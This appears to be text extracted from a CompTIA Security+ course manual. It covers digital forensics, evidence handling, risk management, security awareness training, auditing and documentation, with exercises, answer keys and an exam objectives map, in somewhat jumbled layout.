Digital evidence poses special challenges for its admissibility in court. To address such legal issues, the following steps should be employed. Preparation Preparation is the key to success in digital forensics. A little bit of effort before the breach ever happens can make the forensic process significantly easier, quicker, and more reliable. Appropriate training and the creation of toolkits for various operating systems are critical to a proper analysis. Collection of evidence Collection involves the search for and recognition, recovery, and documentation of digital evidence. Digital evidence may involve real-time or stored information that may be lost unless precautions are taken at the crime scene. Authentication Authentication involves the generation of mathematical validation codes of collected digital evidence. This helps resolve questions that might be raised during litigation about the accuracy of the evidence. Examination of evidence Examination helps to make the evidence visible and explain its origin and significance. It should document all components of the captured evidence in its entirety. Such documentation allows all parties to discover what is contained and presented by the evidence. This process includes the search for information that may be hidden or obscured. Analysis of evidence Analysis differs from the examination phase in that it inspects the outcome of the examination of the evidence for its significance and values to the case. Documenting and reporting of evidence Documentation is not really done as the last step in the sequence but is an ongoing process throughout the other steps. The type and format of documentation is partially dictated by the intended use of the report that is generated. An analysis that is performed primarily to generate a better patch to avoid future breaches may have substantially different documentation from one that is intended to be used in a criminal prosecution. There are other models with greater or fewer steps; however, all contain the same basic processes.
174
CompTIA Security+ Certification Preparation A good forensic analyst must be very much of a generalist, with broad experience and training. Because a security breach should only have happened because network or systems administrators were not prepared for it, understanding the methods used to gain access requires a breadth of knowledge. Experience in network function, intrusion detection techniques, logging, and operating system configuration are necessary. A good toolkit must be prepared in advance of the need for forensic analysis. Once a system has been breached, the best indication of how an attacker gained access may help focus the investigation on the compromised system. These toolkits should be set up as part of any good security system but should be established with forensics in mind dont assume that your users will be doing things that are expected. Collection of evidence If evidence is to be admissible in court, it must be handled properly. The data and memory on the system should be treated as the state of a crime scene and must not be modified, because it may be impossible to reconstruct. Even running forensic tools on a system to collect data may remove critical information from the system. Many forensic activities require administrator or root-level access and many actions taken with that authority cannot be undone. Forensic investigators should use the following guidelines as a basis for formulating the evidence collection procedure: Capture a picture of the system and its surroundings. You may even want to videotape the entire process while the analyst works on the system to have an undisputable record for later use. Keep detailed notes. These should include dates and times of all actions taken at the site. Because its difficult to keep up with all the output and potential system errors (and because installing a text capture program would modify the system), a good suggestion is to record the server and surrounding area with a video camera and then set it up on a tripod, focusing the camera at the terminal monitor. Limit direct access to the file system as you are collecting the evidence and avoid updating files or the directory access table. If possible, analysis should be done on a bit-level copy of the systems storage media, rather than the original. The original can be kept secure should the authenticity of the data ever come into question later. Volatility Collecting evidence may actually destroy other evidence. While collecting digital evidence, forensic investigators should proceed from the more volatile assets to the less volatile ones. Following is a typical order of volatility for most systems: Memory Registry, routing table, arp cache, process table Network connections Temporary files Disk or storage device
Computer forensics and advanced topics Collection procedures
175
Digital evidence collection procedure should be documented in detail to avoid litigation issues. The documentation of collection procedures should lessen the amount of decision-making needed during the collection process. However, the analyst must modify his procedures to follow where the evidence leads, instead of blindly following a set of procedures. It is important to make sure that the methods of evidence collection are as transparent as possible. Such actions should not alter the media that holds the potential evidence. Investigators should be prepared to disclose the collection methods. Forensic investigators should pay close attention to the following guidelines: Do not run programs that modify files or their access times. Do not shutdown until the most volatile evidence has been collected. Do not trust the programs on the system. It is common to find that critical forensic tools have been modified with trojanized versions, which can provide false or misleading output. Collection steps Begin by making a list of all the systems, software, and data involved in the incident, as well as the evidence to be collected. Establish criteria regarding what is likely to be relevant and admissible in court. Remove all external factors that may cause accidental modification of the file system or system state. Perform a quick analysis of external logs and IDS output to provide a hint of where to focus the investigation on the target system. Following the levels of volatility, check the processes running on the system, looking for any that appear out of place and then copy the arp cache, routing table, registry, and status of network connections, including detecting promiscuous NICs. A good toolkit includes a utility to do a core dump of the memory, so that information can be maintained as well. Capture temporary files that may be deleted if the system is shutdown and rebooted. Remember to run all programs from a trusted read-only source and write the results to the screen and removable media. Finally, make a bit-by-bit copy of the entire media to a backup device. Once the backup is complete and all physical network structures and hardware specifications have been recorded, the original media should be removed and stored in a secure location. Further analysis can be done on the same or another system after the backup has been restored on another hard drive.
176
CompTIA Security+ Certification Authentication and evidence handling procedures It is important to be able to prove that neither the original data nor the analyzed data has been tampered with. Experienced computer forensic specialists rely upon mathematical validation to verify that the restored image of a computer disk drive and relevant files exactly match the contents of the original computer. Authenticating the evidence resolves questions about the accuracy of the restored mirror image that may be raised during litigation. Electronic signatures also act as a means of protection for the computer forensic specialist against potential allegations that files were altered or planted by law enforcement officials during the processing of the computer evidence. The physical media on which the digital evidence is stored must be carefully guarded. After removing it from the system, the disk or entire system should be placed in a container, which is labeled, sealed, signed, and dated in a manner in which tampering will be obvious. The container should be locked in a manner in which access is very limited to people who must have access. From that point on, only the copy of the data should be used for analysis, unless that becomes corrupt or the original is needed to validate the accuracy of the data on the copy. Part of the evidence-handling process must be to maintain a chain of custody to keep track of individuals that have accessed the evidence. Investigators should create a chainof-custody form and manage it very carefully during and after the forensic investigation. Mismanagement of chain of custody could result in legal complications, which can consequently prevent prosecution. A typical chain-of-custody form should include: The individual(s) who discovered the evidence. Exact location of evidence discovery. The date and time when the evidence was discovered. The individual(s) who initially handled or processed the evidence. The location, date, and time when the evidence was initially processed. Individuals who had custody of the evidence, the period during which they had custody, and how the evidence was stored during that period. When the evidence changed custody and when and how the transfer occurred. If the evidence changed possession, then the exchanging parties should sign the document. Examination and analysis After the evidence has been properly collected and documented, examination of each piece of data and how they relate to each other is performed in an attempt to recreate the crime. The focus is on answering the four questions of what, where, when, and how. If sufficient information is available, the questions of who and why may be pursued as well. This portion of the process is partially skill and experience and partially intuitionone clue may lead to others to develop an impression of what happened. Additional evidence may be required for further analysis in an attempt to positively establish the answers to the questions.
Computer forensics and advanced topics Do it!
177
A-1:
Discussing the forensic process
Exercises
1 _______________ is information and data of investigative value that is stored on or transmitted by an electronic system such as a computer. A
B
Forensics Digital evidence Electronic signatures Auditing
C D
2 Arrange the following in the order of the forensic process: ___ Analysis ___ Collection ___ Examination ___ Preparation ___ Documentation 3 Which item is most volatile? A B C
D
4 2 3 1 5
Temporary files Routing table Storage device Memory
4 Digital evidence is: A B C D

E
Time sensitive Extremely volatile Highly susceptible to tampering Often concealed All of the above
5 The purpose of __________ is keeping track of persons who have accessed the evidence.
chain of custody
178
CompTIA Security+ Certification 6 The generation of mathematical validation codes of collected digital evidence is called ___________.
authentication
7 Which of the following is not included in a typical chain-of-custody form? A B C

D
Where, when, and by whom was the evidence discovered? Where, when, and by whom was the evidence handled or examined? Who had custody of the evidence? During what period? How was it stored? What were the physical attributes of the discovered evidence?
8 Electronic __________ act as a means of protection for the computer forensic specialist against potential allegations that files were altered or planted by law enforcement officials during the processing of the computer evidence.
signatures
179
Topic B: Risk identification

# 5.7 Objective Understand and be able to explain the following concepts of risk identification Asset Identification Risk Assessment Threat Identification Vulnerabilities
Managing risk
Explanation Unless an organization has unlimited resources, the network administrators will probably not be able to entirely secure everything under their control. Risk management is the process through which risks are identified and controls are put in place to minimize or mitigate the effects of resulting breaches. An analysis of risk, possible actions to mitigate or eliminate that risk, and the potential gains by implementing those actions should be done to determine appropriate security levels. In order to appropriately manage risk, valuable assets must be identified, and an assessment of risk to those assets must be made, including recognition of specific threats that would put those assets at risk. Finally, this process should result in a list of critical vulnerabilities that should be addressed.
Asset identification
Risk management starts with the identification of the assets that need protection. Assets are simply things that are of value. This usually includes data on the systems, as well as CPU time and network use, but may also include other system assets. In addition to identification, a value should be placed on each asset, as in how much would it cost to replace if it were lost, stolen, or became unavailable for a period.
Risk assessment
Risk is the potential for an occurrence that may put an asset in jeopardy. It is impossible to eliminate all risks associated with asset preservation. It is, however, important to control or reduce areas with high risk, particularly when the cost of realizing that risk is also high. Identification of risk is critical as is the enumeration of all known potential risks.
Threat identification
For a risk to be realized and an asset loss to be incurred, a corresponding threat must be present. For instance, an e-mail virus is not a threat on systems that do not handle e-mail in any way; and network breaches are much less of a threat on isolated systems or networks. For each risk identified in the previous section, related threats should be listed. This may be a cyclical processas threats are identified, other assets or risks may be uncovered, which will require further enumeration of threats.
1710 CompTIA Security+ Certification Vulnerabilities

A system is considered vulnerable if an asset is at risk and the associated risk does exist. The degree to which an asset is vulnerable, the value of the asset, and the cost of lowering the threat all must be considered when allocating system security resources. This can be viewed as a simple cost benefit problem. In other words, what is the cost to remove or limit a threat and what are the benefits of lowering the risk of asset loss? If the cost of the asset at risk times the probability of the threat occurring that causes the loss is greater than the cost of preventing the threat, that security should be put in place. Determining the variables to any degree of accuracy, however, is difficult, and new threats arise frequently. Reevaluation of system vulnerabilities and reallocation of protection assets can minimize the business loss caused by security breaches. Do it!
B-1:
Discussing risk management
Exercises
1 Risk management starts with the identification of the assets that need protection. True or false?
True
2 Risk assessment and ____________ combine to determine vulnerability of an asset.

threat identification
3 Which of the following is not a component of risk management? A B

C
Identify and quantify assets to be safeguarded. Measure the criticality of each asset by determining the impact of the loss of each asset. Purchase insurance to cover all potential threats. Identify and quantify the vulnerabilities associated with each asset when matched with each threat.
4 The greater the number and magnitude of ___________, the greater is the probability or risk that a loss event will occur.
threat
1711
Topic C: Education and training

# 5.8 Objective Understand the security relevance of the education and training of end users, executives and human resources Communication User Awareness Education On-line Resources
The importance of education

Explanation Education about computer systems and potential security risks is one of the most costeffective tools in computer security. Knowledge of systems documentation helps prevent accidental data loss. Knowledge of security procedures places each user on the overall system security team and raises awareness that may lead a non-administrative user to identify a potential security problem or breach. Making resources and references available provides additional details that might have been omitted because of limited time available for formal training.
Communication
Social engineering preys on human vulnerabilities and a natural willingness to help. Loose lips sink ships is as applicable to systems security as the Navy. Usernames and passwords must be conscientiously guarded. Information that may never be divulged over the phone should be clearly delineated in training. Personnel authorized to provide such information should require proof of positive identity from the requester or have a secure method for communicating the required information that is available only to the intended recipient.
1712 CompTIA Security+ Certification User awareness

All personnel who have access to computer systems should be trained in how to effectively discharge their security responsibilities. The degree and content of the training will vary depending on the policy objectives of the agency. Nevertheless, the following agenda outlines items that should be included in any custom-developed user security training and awareness package: Purpose of the training and awareness program Agency security appointments and contacts Contacts and action in the event of a real or suspected security incident Legitimate use of system accounts Access and control of system media Sanitization (degaussing, overwriting, or destruction) of media and hard copies Security of system accounts (including sharing of passwords) Authorization for applications, databases, and data Use of the Internet, the Web, and e-mail To reinforce formal training, a sufficiently high level of awareness can be maintained through ongoing reminders such as logon banners, system access forms, and departmental bulletins.
Online resources
Online delivery of educational materials as well as policies and procedures is a very effective way of delivering important information to a large number of people. One option is to create specific directories on a companys network to which users and/or IT personnel have access. Another is to create one or more areas on a companys internal Web site or Intranet devoted to security and disaster recovery policies and procedures. These pages can include text as well as multi-media content, such as audio and video files. Further, IT personnel in particular can make use of resources on the Internet, such as knowledge bases and other manufacturers support web sites to help troubleshoot problems and obtain software updates and fixes.
Computer forensics and advanced topics Do it!
1713
C-1:
Discussing education and training

1 Education about computer systems and potential security risks is one of the most cost-effective tools in computer security. True or false?
True
2 Name three ways that user awareness training can enhance system security.
Helps prevent accidental data loss. Places each user on the overall system security team and raises awareness that may lead
a non-administrative user to identify a potential security problem or breach.
Reduces the threat of social engineering.
3 Which of the following items should be included in a custom-developed user security training and awareness package? (Choose all that apply.)
A B
Contacts and action in the event of a real or suspected security incident Legitimate use of system accounts Virus detection Overview of the network architecture Access and control of system media Sanitization of media and hard copies
C D
E F
4 Security-related pages on a companys internal Web site are an example of an online resource aimed primarily at IT personnel. True or false?
False
Topic D: Auditing
# 1.7 Objective Understand the concept and significance of auditing, logging and system scanning
System monitoring
Explanation The best security procedures are of limited value if those procedures are not tested to ensure that they work properly. In addition, it can never be assumed that these security procedures are the final word. Rather, the system must be continuously monitored to ensure that procedures provide the level of security that is required. Testing security procedures and monitoring their effectiveness are both aspects of auditing. Auditing is an essential element of an overall security policy. Without good auditing procedures, a system is left vulnerable to attacks. One important part of auditing involves monitoring the system. This includes monitoring access to network resources, such as files, as well as monitoring specific actions by users. The auditing information is written to a security log and includes information such as the identity of the user, the date and time of the action, and what action took place. Actions that can be monitored by logging include users signing on and signing off, modifying user or group account information, and reading and writing selected files. For each of these events, an audit entry into the security log will indicate if the action was a success or failure. Although recording all of these actions may make the log files very large, they can be filtered to display only selected records. Another option is to display only log failures. In addition to monitoring, another important part of auditing involves scanning the system. Network and system security scanning will reveal the vulnerabilities of the current system. Scanning also provides the following benefits: Enables corrective action to take place in a timely fashion Reduces the risk of attacks Avoids litigation from customers Reduces performance problems Qualifies for information protection insurance Reveals upgrades needed for future expansion System scanning typically involves two procedures. First, using well-known network and system assessment tools, the scan gathers information about the system and network configuration to determine vulnerable entry points that a hacker could use to gain access. Second, system scanning uses what is known as Penetration Testing. Tools commonly used by hackers are used to simulate an actual intruder attack, but in a controlled and safe environment. By attempting to penetrate the system, the scan can reveal the extent of vulnerabilities. System scanning typically includes penetration testing from in-house locations, the Internet, and through remote dial-in or broadband access.
1715
System security scanning may be performed either in-house or by a third party. Some companies have the necessary resources and choose to audit their own security. The advantage to performing a security audit in-house is that the system can be scanned whenever necessary, such as when new systems are installed or configurations are changed. However, the disadvantage of performing the scanning audit in-house is that the audit may not be objective. In addition, the skills and experience of in-house personnel may not be at the level needed. Third party scanners typically offer a comprehensive report that describes the vulnerabilities that were detected, the risk associated with each vulnerability, and recommendations for correcting the problem. Consulting companies that provide system-scanning services refer to it as a Security Vulnerability Assessment, Security Audit, or On-line Penetration Testing. The audit should give detailed information on what tools were used, how and when the scan was conducted, what vulnerabilities were scanned for, and list the vulnerabilities by risk level. A security scan should be conducted at least once per year. Companies that process financial transactions and medical records should conduct a security vulnerability assessment quarterly. Once a security vulnerability assessment has been performed, it is important to take corrective action immediately. This audit escalation means that the audit has revealed a problem and that its importance is adjusted accordingly. If a significant amount of time passes between when the audit occurs and when the corrective action is taken, many of the system settings may have changed, and the report from which the corrective action is being made may no longer be accurate. Some companies are reluctant to perform a security scan audit in the event that it reveals a security problem and then opens up the organization to litigation. Audit privilege laws are traditionally set up to protect participating companies from the disclosure of violations found during an audit. In return, the company is given advice on how to correct the problem in order to achieve the necessary level of security. Audit usage is also a key part of auditing. Audit usage monitors the usage of the system and provides valuable information for future capacity planning. The information provided helps determine, for example, whether investment in new applications provides a positive return by tracking when and how they are being used.

Do it!
D-1:
Understanding auditing

1 Security logs include information such as: A B C D
E
Date and time of the action Identity of the user What action took place Whether the action was a success or failure All of the above
2 _____________ displays only selected records in the log files.

Filtering
3 What is Penetration Testing?

Penetration Testing simulates an actual intruder attack using tools commonly used by hackers, but in a controlled and safe environment.
4 System scanning typically includes penetration testing from: (Choose all that apply.)
A B
Internal sources The Internet The firewall Remote dial-in or broadband access All of the above
C
D
5 Which of the following items are not included in the audit? A B

C
What tools were used How and when the scan was conducted Which threats were detected What vulnerabilities were detected and their risk level Recommendations for correcting the problem
D E
6 An __________ ____________ is an indication that the audit has revealed a problem and its importance must be adjusted accordingly.
audit escalation
7 Discuss the pros and cons of doing security scanning in-house versus using a third party.
A third party will cost more but will also be more objective and thorough than using an inhouse team.
1717
Topic E: Documentation
# 5.9 Objective Understand and explain the following documentation concepts Standards and Guidelines Systems Architecture Change Documentation Logs and Inventories Classification Notification Retention / Storage Destruction
The components of proper documentation

Explanation Without proper documentation, maintenance and upkeep of any reasonably complex system and network becomes virtually impossible. Before upgrades are performed, a determination of whether the change is appropriate and what effect it will have on the system must be made. When a breach is suspected, a list of the system baseline will assist in determining the extent of damage. System, network, and backup logs ensure proper following of procedures and can be used to analyze the need for security or systems upgrades as well as audit actions taken by support personnel. The following types of documentation are important factors in maintaining a secure networking environment: Standards and guidelines Systems architecture Change documentation Logs and inventories Classification and notification Retention and storage Destruction
Standards and guidelines

Before specific actions can be expected of either administrators or users, expectations must be clearly specified in a policies and procedures document. The documents should be made available during initial orientation of all new employees, and the employees should formally agree to abide by these standards and guidelines.
1718 CompTIA Security+ Certification Systems architecture

As systems and networks become more complex, it is increasingly more difficult to recognize relationships between systems and even vulnerabilities that exist. Documenting the architecture of the entire system can make troubleshooting problems substantially easier. Architecture descriptions should include all networks and all attached devices, as well as critical configuration information, such as network addresses and operating systems. Every time something on the system changes, this document should be immediately updated, or its currency and value to administrators decrease.
Change documentation
In addition to architecture documentation, each individual system should have a separate document that describes its initial state and all subsequent changes. This includes configuration information, patches applied, backup records, and even suspected breaches. Printouts of hash results and system dates of critical system files may be pasted into this book. System maintenance can be made much smoother with a comprehensive change document. For instance, when a patch is available for an operating system, it typically only applies in certain situations. Manually investigating the applicability of a patch on every possible target system can be very time consuming; however, if logs are available for reference, the process is much quicker and more accurate.
Logs and inventories

An automated logging process should be established. Real-time tools can be used on the logs to identify potential problems to be addressed, even before users notice them. If a breach does happen, logs are important tools for the forensic analysis of the event. Additionally, a detailed inventory of each system and subcomponent should be centrally kept. This should include hardware type, BIOS type and version, memory capacity, hard drive type and capacity, operating system, network interface address, and other installed hardware, as well as a log of any changes to the physical structure of the system. A log such as this is very helpful in assessing the impact of adding a new software package that might have certain requirements to run properly. It may also help in identification of a NIC card that is malfunctioning and flooding the network with frames.
1719
Classification and notification

Classification policies define how information is to be handled, depending on the level of confidentiality. Some of the more commonly encountered classifications are unclassified, classified, confidential, secret, and top secret. Unclassified means that the material can be viewed by people outside of the organization. Classified means that the material is intended for internal use only. Confidential means that the information is intended only for the person to whom it was specifically sent. The confidential information should be encrypted when stored or transmitted electronically. Secret and top secret indicates that the information is critical to business operations. A compromise of this information could seriously impact business operations or even ruin the company. Examples of secret information would include trade or military secrets. Secret information must be encrypted when stored or transmitted electronically. Personnel implicated in compromise of secret information are terminated and criminally prosecuted. Notification policies define who is notified when classified information is compromised. All breaches of security policies should be reported immediately to the appropriate security personnel. The classification policies should clearly specify the classification types, contact personnel, and consequences of compromising the classified information.
Retention and storage

Data is stored in many ways, and documenting those requirements helps ensure administrative personnel adhere to established procedures. Processes for storing and backing up data should be covered. Backup methods and timing for various systems should be covered, as well as the length of time a given backup set should be stored and even how many times a tape can be reused. All of these are important components in storage document policy. Specialized storage features, such as aging of data, which is common in central storage environments where space is at a premium, should be explained. If an item is not accessed for a certain period, it may be archived, requiring a special request to have that data or program restored before it can be used again. After a longer period of disuse, the item may be permanently removed.
Destruction
Finally, appropriate methods for destroying data, records, and even entire systems should be detailed. Simply deleting a file does not actually remove it from the disk, but merely removes the pointer to the data. To actually make the disk unreadable is a more complex process or requires physical destruction. If a system or data on that system has been identified as a corporate asset, then improper destruction will always be a threat leading to a potential vulnerability, and it should be treated as such.

Do it!
E-1:
Discussing documentation

1 File deletion is an acceptable form of data destruction. True or false?
False. Use zeroization, degaussing, or physically destroy the medium.
2 Which of the following documents is necessary for a good security program? A B C

D
Systems architecture System logs Inventories All of the above
3 What is the purpose of change management documentation?

To describe the initial state and all subsequent changes to a system. This facilitates the process of system maintenance.
4 Explain the reasons for classifying information and systems.

Not all users should have access to all systems and information, and a classification system should be developed that states the details.
1721
Unit summary: Computer forensics and advanced topics

Topic A In this topic, you learned how computer forensics is used to gather and analyze evidence pertaining to a computer security incident in order to determine what happened, and when, where, and how it happened. You learned that digital evidence is extremely volatile and requires great care and skill when handling it. You also examined the recommended procedures for collecting, examining, and analyzing digital evidence. In this topic, you learned that risk management is the process through which risks are identified and controls put in place to minimize their effect. You learned that determining risk involves three factors: asset identification, risk assessment, and evaluation of vulnerabilities. There is an expense incurred with security, so assets of high value that are at risk and have an associated threat should be allocated security resources first. In this topic, you learned that education and training help all users better perform their jobs. Making all users more aware of potential security problems creates an environment in which everyone is able to identify and report possible security problems. Online resources can help with the dissemination of important security-related policies and procedures. In this topic, you learned that testing of security procedures is accomplished through auditing. You learned that there are two methods: monitoring and scanning. You learned that monitoring is a passive form of auditing, where network activity is logged and examined for security breaches, while scanning actively collects information about the system and network configuration and even simulates attacks to reveal vulnerabilities. In this topic, you learned that documentation is as critical to security as it is to general systems administration. Documentation can be a tedious process, but the time spent in administering undocumented systems dwarfs the time that would have been spent in properly documenting. If systems are breached or a catastrophic loss occurs, system documentation may be a necessity for restoration.
Topic B
Topic C
Topic D
Topic E
Review questions
1 What is computer forensics?
The acquisition and analysis of evidence pertaining to a computer security incident.
2 What is digital evidence?

Information and data of investigative value that is stored on or transmitted by an electronic system such as a computer.

3 List the steps to take in making sure digital evidence is admissible in court.
Preparation Collection of evidence Authentication Examination of evidence Analysis of evidence Documenting and reporting of evidence
4 Collecting evidence may destroy other evidence. True or false?
True
5 When collecting evidence, you should start by restarting the computer. True or false?
False. Do not shutdown until the most volatile evidence has been collected.
6 What is risk management?

The process through which risks are identified and controls are put in place to minimize or mitigate the effects of resulting breaches.
7 What needs to be done in order to appropriately manage risk?

Identify assets that need protection, identify risks, identify threats, and identify vulnerabilities.
8 Education about computer systems and potential security risks is one of the most cost-effective tools in computer security. True or false?
True
9 Delivery of security training should never be delivered online as it is a risk to the organization for it to be online. True or false?
False. It is one of the most effective ways of delivering the information to large groups of users.
10 In auditing a system, what are the two procedures system scanning typically involves?
First, using well-known network and system assessment tools, the scan gathers information about the system and network configuration to determine vulnerable entry points that a hacker could use to gain access. Second, system scanning uses what is known as Penetration Testing.
11 System security scanning should only be done in-house since third-party scanning exposes the system to additional risks. True or false?
False. It can be a more objective scan if an outside party performs it.
12 What happens if an audit discloses violations? Is the company opened up to litigation?

Audit privilege laws are traditionally set up to protect participating companies from the disclosure of violations found during an audit. In return, the company is given advice on how to correct the problem in order to achieve the necessary level of security.
Computer forensics and advanced topics 13 List the types of documentation you need to maintain for a secure network environment.
1723
Standards and guidelines Systems architecture Change documentation Logs and inventories Classification and notification Retention and storage Destruction
14 Information intended only for the person to whom it was sent should be marked: A Unclassified. B Classified.
C
Confidential.
D Secret.
A1
Appendix A Certification exam objectives map

This appendix covers these additional topics:
A CompTIA Security+ exam objectives with
references to corresponding coverage in this course manual.
A2
Topic A: Comprehensive exam objectives

Explanation This topic provides a listing of all CompTIA Security+ exam objectives and indicates where each objective is covered in conceptual explanations, activities, or both.
Domain 1.0: General Security Concepts

Objective 1.1 Recognize and be able to differentiate and explain the following access control models MAC (Mandatory Access Control) DAC (Discretionary Access Control) RBAC (Role Based Access Control) 1.2 Recognize and be able to differentiate and explain the following methods of authentication Kerberos CHAP (Challenge Handshake Authentication Protocol) Certificates Username / Password Tokens Multi-factor Mutual Biometrics 1.3 Identify non-essential services and protocols and know what actions to take to reduce the risks of those services and protocols Unit 2, Topic B Unit 2, Topic C Unit 2, Topic D Unit 2, Topic A Unit 2, Topic E Unit 2, Topic F Unit 2, Topic B Unit 2, Topic F Unit 2, Topic A Unit 3, Topic C Unit 3, Topic H Unit 13, Topic A Unit 13, Topic B Unit 13, Topic C Unit 13, Topic D F-1 B-1 C-1 D-1 A-1, A-2, A-3 E-1 Unit 1, Topic D Unit 1, Topic D Unit 1, Topic D Conceptual information Supporting activities
A-4 B-2, B-3 C-2, C-4 D-3, D-4
1.4
Recognize the following attacks and specify the appropriate actions to take to mitigate vulnerability and risk DOS / DDOS (Denial of Service / Distributed Denial of Service) Back Door Spoofing Unit 3, Topic A A-3, A-4 E-1 H-3 C-3 E-1
Unit 3, Topic H Unit 3, Topic C
Certification exam objectives map

Objective 1.4 (continued) Man in the Middle Unit 3, Topic B Unit 3, Topic C Unit 3, Topic D B-1 E-1 D-1 E-1 E-1 G-2 G-2 F-1 G-2 Conceptual information
A3
Supporting activities
Replay
TCP/IP Hijacking Weak Keys Mathematical Social Engineering Birthday Password Guessing Brute Force Dictionary Software Exploitation 1.5 Recognize the following types of malicious code and specify the appropriate actions to take to mitigate vulnerability and risk Viruses Trojan Horses Logic Bombs Worms 1.6 Understand the concept of and know how reduce the risks of social engineering Understand the concept and significance of auditing, logging and system scanning
Unit 3, Topic E Unit 3, Topic G Unit 3, Topic G Unit 3, Topic F Unit 3, Topic G
Unit 3, Topic G Unit 3, Topic G Unit 3, Topic H
G-2 G-2 H-3
Unit 3, Topic H Unit 3, Topic H Unit 3, Topic H Unit 3, Topic H Unit 3, Topic F
H-1 H-1
H-3 F-1
1.7
Unit 17, Topic D
D-1
A4
Domain 2.0: Communication Security

Objective 2.1 Recognize and understand the administration of the following types of remote access technologies 802.1x VPN (Virtual Private Network) RADIUS (Remote Authentication Dial-In User Service) TACACS (Terminal Access Controller Access Control System) L2TP / PPTP (Layer Two Tunneling Protocol / Point to Point Tunneling Protocol) SSH (Secure Shell) IPSEC (Internet Protocol Security) Vulnerabilities 2.2 Recognize and understand the administration of the following e-mail security concepts S/MIME (Secure Multipurpose Internet Mail Extensions) PGP (Pretty Good Privacy) like technologies Vulnerabilities SPAM Hoaxes 2.3 Recognize and understand the administration of the following Internet security concepts SSL / TLS (Secure Sockets Layer / Transport Layer Security) HTTP/S (Hypertext Transfer Protocol / Hypertext Transfer Protocol Instant Messaging Vulnerabilities Packet Sniffing Privacy Unit 6, Topic A A-2, A-5, A-6, A-7 Unit 5, Topic B B-2 Unit 4, Topic B Unit 4, Topic C Unit 4, Topic B B-1 C-1, C-2 B-2 Conceptual information Supporting activities
Unit 4, Topic B
Unit 4, Topic C
C-3, C-4
Unit 4, Topic C Unit 4, Topic C Unit 4, Topic D
C-4 C-4
Unit 5, Topic B Unit 5, Topic C Unit 5, Topic C Unit 5, Topic C
B-1, B-2, B-3, B-4
C-1 C-1
Unit 6, Topic A
A-8
Unit 8, Topic D Unit 8, Topic D Unit 8, Topic D Unit 8, Topic D
D-1 D-1 D-1 D-1

Objective 2.3 (continued) Vulnerabilities Java Script ActiveX Buffer Overflows Cookies Signed Applets CGI (Common Gateway Interface) SMTP (Simple Mail Transfer Protocol) Relay 2.4 Recognize and understand the administration of the following directory security concepts SSL / TLS (Secure Sockets Layer / Transport Layer Security) LDAP (Lightweight Directory Access Protocol) 2.5 Recognize and understand the administration of the following file transfer protocols and concepts S/FTP (File Transfer Protocol) Blind FTP (File Transfer Protocol) / Anonymous File Sharing Vulnerabilities Packet Sniffing Unit 7, Topic B Unit 8, Topic D Unit 9, Topic G Unit 3, Topic H Unit 13, Topic B D-1 G-2 Unit 7, Topic B Unit 7, Topic B Unit 7, Topic C Unit 6, Topic A Unit 6, Topic B Unit 6, Topic B Unit 6, Topic B Unit 6, Topic B Unit 6, Topic B Unit 6, Topic B Unit 6, Topic B Unit 6, Topic B B-1 B-1 B-2 B-2 B-3 B-3 B-4 Conceptual information
A5
A-2, A-5, A-6, A-7
Unit 7, Topic A
A-1
B-1, B-2, B-3, B-4 B-4 C-1
8.3 Naming Conventions 2.6 Recognize and understand the administration of the following wireless technologies and concepts WTLS (Wireless Transport Layer Security) 802.11 and 802.11x WEP / WAP (Wired Equivalent Privacy / Wireless Application Protocol) Vulnerabilities Site Surveys
Unit 8, Topic B Unit 8, Topic A Unit 8, Topic B Unit 8, Topic C Unit 8, Topics A-C Unit 8, Topic C
B-2 A-1 B-1, B-2 C-1, C-2
C-3, C-4
A6
Domain 3.0: Infrastructure Security

Objective 3.1 Understand security concerns and concepts of the following types of devices Firewalls Routers Switches Wireless Modems RAS (Remote Access Server) Telecom / PBX (Private Branch Exchange) VPN (Virtual Private Network) IDS (Intrusion Detection System) Network Monitoring / Diagnostics Workstations Servers Mobile Devices 3.2 Understand the security concerns for the following types of media Coaxial Cable UTP/STP (Unshielded Twisted Pair / Shielded Twisted Pair) Fiber Optic Cable Removable Media Tape CD-R (Recordable Compact Disks) Hard Drives Diskettes Flashcards Smartcards Unit 10, Topic A Unit 10, Topic A A-1, A-2 A-1, A-2 Unit 9, Topic A Unit 9, Topic B Unit 9, Topic C Unit 9, Topic D Unit 9, Topic D Unit 9, Topic E Unit 9, Topic D Unit 9, Topic E Unit 9, Topic F Unit 9, Topic G Unit 13, Topic D Unit 13, Topic D Unit 9, Topic D A-1, A-2 B-1 C-1 D-1 D-1 E-1 D-1 E-1 F-1 G-1, G-2, G-3 D-1 through D-5 D-1 through D-5 D-1 Conceptual information Supporting activities
Unit 10, Topic A Unit 10, Topic B Unit 10, Topic B Unit 10, Topic B Unit 10, Topic B Unit 10, Topic B Unit 10, Topic B Unit 10, Topic B
A-1, A-2
B-1 B-1 B-1 B-1 B-1 B-1

Objective 3.3 Understand the concepts behind the following kinds of Security Topologies Security Zones DMZ (Demilitarized Zone) Intranet Extranet VLANs (Virtual Local Area Network) NAT (Network Address Translation) Tunneling 3.4 Differentiate the following types of intrusion detection, be able to explain the concepts of each type, and understand the implementation and configuration of each kind of intrusion detection system Network Based Active Detection Passive Detection Host Based Active Detection Passive Detection Honey Pots Incident Response 3.5 Understand the following concepts of Security Baselines, be able to explain what a Security Baseline is, and understand the implementation and configuration of each kind of intrusion detection system OS / NOS (Operating System / Network Operating System) Hardening File system Updates (Hotfixes, Service Packs, Patches) Unit 13, Topic A A-2, A-3 Unit 12, Topic B Unit 12, Topic C Unit 12, Topic C Unit 12, Topic B Unit 12, Topic C Unit 12, Topic C Unit 12, Topic D Unit 12, Topic E B-1 C-1 C-1 B-2 C-1 C-1 D-1 E-1 Unit 11, Topic A Unit 11, Topic A Unit 11, Topic A Unit 11, Topic A Unit 11, Topic D Unit 11, Topic B Unit 11, Topic C A-1 A-1 A-1 D-1 Conceptual information
A7
B-1 through B-4 C-1
Unit 13, Topic A Unit 13, Topic A Unit 13, Topic D
A-3, A-4
D-1
Objective 3.5 continues on following page
A8

